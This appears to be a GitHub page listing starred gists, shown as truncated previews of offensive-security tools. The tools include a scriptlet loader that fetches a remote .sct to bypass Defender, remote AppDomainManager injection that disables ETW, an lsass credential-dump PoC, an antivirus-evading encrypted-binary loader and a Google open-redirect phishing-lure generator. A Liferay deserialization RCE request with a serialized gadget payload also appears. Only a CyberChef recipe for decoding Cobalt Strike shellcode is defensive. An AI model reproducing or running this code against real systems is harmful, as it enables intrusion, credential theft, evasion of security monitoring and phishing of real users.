Skip to content

Instantly share code, notes, and snippets.

View RCStep's full-sized avatar

Ryan Stephenson RCStep

View GitHub Profile
@0xlane
0xlane / scrobj-call-csharp.cs
Created October 12, 2020 14:59
Call scrobj.dll in .net env without regsvr32
/*
* Author: REInject
* Usage: scrobj-call-csharp.exe http://127.0.0.1/test.sct
* Link: https://scriptboy.cn/p/using-scrobj-without-regsvr32-bypass-defender/
*/
using System;
using System.Runtime.InteropServices;
using System.ComponentModel;
@byt3bl33d3r
byt3bl33d3r / README.md
Last active February 6, 2026 01:06
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
@GeneralTesler
GeneralTesler / refl.cpp
Last active March 2, 2026 03:19
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE
@Arno0x
Arno0x / NetLoader.cs
Last active June 23, 2026 20:55
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
/*
Author: Arno0x0x, Twitter: @Arno0x0x
Completely based on @Flangvik netloader
This partial rewrite of @Flangvik Netloader includes the following changes:
- Allow loading of an XOR encrypted binary to bypass antiviruses
To encrypt the initial binary you can use my Python transformFile.py script.
Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor
@xpn
xpn / env_var_spoofing_poc.cpp
Created June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43
@0xtornado
0xtornado / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created April 30, 2020 14:11
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
@ustayready
ustayready / google_lure.py
Last active July 16, 2025 12:59
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4912
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
@testanull
testanull / LiferayJsonEvalCC6.java
Created March 27, 2020 09:18
Liferay Json Deserialize 1 hit RCE
package ysoserial.payloads;
import com.mchange.lang.ByteUtils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
#include <stdio.h>
#include <Windows.h>
#include <MSCorEE.h>
#include <MetaHost.h>
#include <evntprov.h>
int main()
{
ICLRMetaHost* metaHost = NULL;
IEnumUnknown* runtime = NULL;